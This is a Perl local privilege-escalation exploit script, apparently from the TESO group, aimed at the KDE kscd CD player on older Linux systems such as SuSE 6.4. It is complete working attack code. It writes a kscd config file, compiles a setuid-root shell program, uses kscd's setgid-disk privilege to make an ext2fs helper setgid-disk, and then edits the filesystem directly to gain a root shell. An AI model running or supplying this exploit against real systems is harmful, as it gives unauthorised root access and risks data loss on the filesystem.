#!/usr/bin/perl

# 7350kscd! The excellent kscd-hack :)
# 
# Bugdiscovery is due to Sebastian Krahmer,
#	http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets:
#		TESO
#		security.is
#		lam3rz
#		29A
#		Mike and Silvio.
#
# Special thanx to
#
# C.P. 		  -- 	roots, bloody roots }|-] 
# Michal Zalewski --	No sex causes what? I can't deciffer the pic ... :PP
#
# Description:
#
# kscd local root exploit. kscd belongs to the KDE multimedia-pack. (stupid)
# As so often with GUI's, kscd is setgid-disk and get's the shell for 
# a browser-execution via SHELL-environment variable. So, we set it
# to /tmp/boomshell which will make ext2fs setgid-disk. Then we use
# ext2fs to change /tmp/boomshell to a setuid-root-file via raw-filesystem
# access (we are group disk!). Please make sure you have
#
# a) ext2fs-lib installed (default)
# b) kscd setgid disk (default on SuSE 6.4 f.e.)
# c) a CD in drive (hmmm ...)
# d) /tmp points to a disk where setuid's are allowes (default)
# e) brain and responsibility (unfortunally not default)	
#
# Note that the change via ext2fs takes affect after next re-mount (e.g. 'reboot')
# We assume that group disk has GID 6. Change if necessary.
#
#
# Warning: You are playing with your filesystem! This can cause data-loss.
#          Use a zip-disk for playing! YOU USE IT AT YOUR OWN RISK!
#	   For educational purposes only!	
#
# This exploit goes under the GPL!
#

sub usage
{
	print "Usage: $0 <device_where_tmp_is (/dev/hdaX)>\n";
	exit 0;
}

$disk = shift or usage();

$kde = $ENV{'HOME'}."/.kde/share/config/kscdrc";

unlink $kde;

`cc ext2fs.c -lext2fs -o /tmp/ext2fs`;

# create kscd config-file -- necessary
open O, ">$kde" or die "Can't open config-file of kscd!\n";
print O<<_EOF_;
# KDE Config File
[SMTP]
enabled=true
serverHost=localhost
serverPort=25
[CDDB]
CurrentServer=www.cddb.com cddbp 8880 -
HTTPProxyHost=
CDDBRemoteEnabled=0
SeverList=www.cddb.com cddbp 8880 -,
CDDBHTTPProxyEnabled=0
HTTPProxyPort=0
LocalBaseDir=/opt/kde/share/apps/kscd/cddb/
[MAGIC]
magicwidth=320
magicheight=200
magicbrightness=3
[General]
ToolTips=1
RandomPlay=0
DOCKING=1
AUTOPLAY=0
CDDevice=/dev/cdrom
CustomBroserCmd=
BackColor=0,0,0
AUTODOCK=0
Volume=40
EJECTONFINISH=0
USEKFM=0
STOPEXIT=1
LEDColor=226,224,255
UnixMailCommand=owned
_EOF_
close O;

# drop boomshell
open O, ">/tmp/boomshell.c" or die "Can't open /tmp/boomshell!\n";
print O<<_EOF_;
#include <stdio.h>

int main()
{
	char *a[] = {
		"/bin/bash",
		NULL
	};
	setuid(0);
	setgid(0);
	
	/* in case we are invoked by kscd */
	if (getuid() != 0) {
		chown("/tmp/ext2fs", getuid(), 6);
		chmod("/tmp/ext2fs", 02755);
		return 0;
	}

	execve(*a, a, NULL);
	return 0;
}
_EOF_
close O;

`cc /tmp/boomshell.c -o /tmp/boomshell`;

$ENV{'PATH'}="/opt/kde/bin:".$ENV{'PATH'};
$ENV{'SHELL'}="/tmp/boomshell";

print "Invoking kscd now.\n";
print "Click [i] -> [Information] -> [Ultimate Bandlist]\n";
print "Exit kscd then.\nI will do the rest.\n";

`kscd`;

print "Execute /tmp/boomshell after next reboot.\n";
# ext2fs should be setgid-disk now, which lets us make a shell suid
exec "/tmp/ext2fs", $disk, "/tmp/boomshell";


